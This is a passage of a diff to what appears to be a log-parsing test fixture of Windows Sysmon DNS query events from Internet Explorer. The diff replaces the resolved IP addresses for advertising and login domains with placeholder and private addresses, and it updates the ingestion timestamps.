Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -2942,22 +2908,22 @@ "type": "CNAME" }, { - "data": "40.90.23.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "40.90.23.213", + "data": "89.160.20.156", "type": "A" }, { - "data": "40.90.23.154", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.90.23.239", - "40.90.23.213", - "40.90.23.154" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -2974,15 +2940,13 @@ "login.live.com" ], "ip": [ - "40.90.23.239", - "40.90.23.213", - "40.90.23.154" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741223300Z", + "ingested": "2021-12-09T13:50:23.456737Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3049,11 +3013,11 @@ }, "answers": [ { - "data": "74.119.119.150", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3061,7 +3025,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -3069,7 +3033,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -3077,7 +3041,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -3085,7 +3049,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -3093,23 +3057,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "74.119.119.150", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -3124,24 +3088,24 @@ "dis.criteo.com" ], "ip": [ - "74.119.119.150", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741232100Z", + "ingested": "2021-12-09T13:50:23.456741800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3209,39 +3173,39 @@ "type": "CNAME" }, { - "data": "68.67.180.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.230", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3249,22 +3213,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "68.67.180.12", - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -3281,23 +3245,16 @@ "ib.adnxs.com" ], "ip": [ - "68.67.180.12", - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741240500Z", + "ingested": "2021-12-09T13:50:23.456747500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3361,12 +3318,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { @@ -3382,13 +3339,13 @@ "cm.g.doubleclick.net" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741248800Z", + "ingested": "2021-12-09T13:50:23.456751700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3452,35 +3409,35 @@ "type": "CNAME" }, { - "data": "54.208.129.24", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.175.5.93", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.210.96", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.93.252.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.86.97.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.239.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.67.102", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3488,21 +3445,21 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "54.208.129.24", - "54.175.5.93", - "52.86.210.96", - "3.93.252.59", - "54.86.97.130", - "34.194.239.194", - "3.94.67.102", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -3518,22 +3475,16 @@ "match.adsrvr.org" ], "ip": [ - "54.208.129.24", - "54.175.5.93", - "52.86.210.96", - "3.93.252.59", - "54.86.97.130", - "34.194.239.194", - "3.94.67.102", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741257200Z", + "ingested": "2021-12-09T13:50:23.456755900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3601,12 +3552,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { @@ -3623,13 +3574,13 @@ "ssum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741265700Z", + "ingested": "2021-12-09T13:50:23.456760500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 